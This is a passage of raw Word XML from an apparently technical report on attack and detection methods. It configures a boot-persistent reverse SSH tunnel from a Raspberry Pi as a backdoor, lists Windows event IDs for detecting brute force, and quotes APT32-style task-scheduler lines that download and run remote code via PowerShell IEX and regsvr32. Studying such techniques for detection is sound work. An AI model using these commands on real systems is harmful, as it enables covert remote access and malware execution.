      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh-keygen -t rsa</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a@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh userserver@IPServer mkdir -p .ssh</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a@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; cat .ssh/id_rsa.pub | ssh userserver@IPServer 'cat &gt;&gt; .ssh/authorized_keys'</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a@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh userserver@IPServer</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a@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>A:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>&gt; ssh-add</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Config reverse shell to run on start up</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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ubuntu@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ubuntu:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>$ cat /etc/init.d/reverseShell</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>bin/sh</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while true</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do</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count=`ps aux | grep "ssh -f -N -R 6969" | wc -l`;</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lastRenderedPageBreak/>
        <w:t>if [ "$count</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>" !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>= "2" ]</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then</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 xml:space="preserve">   `ssh -f -N -T -R 6969:localhost:22 userserver@IPServer`;</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fi</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done</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exit 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:r>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> following command to /etc/rc.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/etc/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>init.d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C4E19">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/reverseShell &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="005C4E19"/>
    <w:p w:rsidR="005C4E19" w:rsidRPr="00A53CB7" w:rsidRDefault="005C4E19" w:rsidP="005C4E19">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>On Server</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7" w:rsidRPr="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>side</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRDefault="005C4E19" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Install openssh with this command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4E19" w:rsidRPr="00FA5535" w:rsidRDefault="005C4E19" w:rsidP="00A53CB7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>sudo apt-get install openssh-server openssh-client</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="005C4E19" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect to r</w:t>
      </w:r>
      <w:r w:rsidR="00A53CB7">
        <w:t>aspberry pi with ssh via command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>ssh -p 6969 ubuntu@localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cobalt Strike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRDefault="00FA5535">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FA5535" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>External Knowledge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:t>Event Log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Windows event log is a record of a computer's alerts and notifications. Microsoft defines an event as "any significant occurrence in the system or in a program that requires users to be notified or an entry added to a log."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Some of event ID on windows to detect brute force</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4378"/>
        <w:gridCol w:w="4402"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00FA5535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5535">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Event ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00FA5535" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA5535">
              <w:rPr>
                <w:b/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00F114B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>529</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Login: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00F114B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>675</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Kerberos Login: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00F114B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>4789, 4625</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>RDP</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00F114B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>258</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">VNC: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00F114B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>40965</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">SMB: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00F114B6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>681</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00F114B6">
            <w:pPr>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>NTLM Login</w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="00B01EDB">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Remote access failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>2.2.6.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Task Scheduler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The Task Scheduler enables you to automatically perform routine tasks on a chosen computer. The Task Scheduler does this by monitoring whatever criteria you choose to initiate the tasks (referred to as triggers) and then executing the tasks when the criteria is met.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>On the other hand, more malware is using Windows Task Scheduler to do its dirty work, such as backdoor, downloader and attack vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Some commands were used on APT 32 by task scheduler </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidTr="00FA5535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">++ powershell.exe -nop -w hidden -c  </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="003137A0" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">              </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>IEX</w:t>
            </w:r>
            <w:r w:rsidR="00FA5535" w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00FA5535" w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>(new-object net.webclient).downloadstring('http://remoteaddress.org:80/a'))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="003137A0" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="003137A0">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:rStyle w:val="pl-s"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">++ </w:t>
            </w:r>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>regsvr32 /s /n /u /</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>i:http://remoteaddress:80/download</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003137A0">
              <w:rPr>
                <w:i/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> trojan.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>2.2.6.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5535">
        <w:rPr>
          <w:rStyle w:val="Heading4Char"/>
        </w:rPr>
        <w:t>Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA5535" w:rsidRPr="00B01EDB" w:rsidRDefault="00FA5535" w:rsidP="00FA5535">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01EDB">
        <w:rPr>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>In Windows NT operating systems, a Windows service is a computer program that operates in the background. Windows services can be configured to start when the operating system is started and run in the background as long as Windows is running. Alternatively, they can be started manually or by an event</w:t>
      </w:r>
    </w:p>
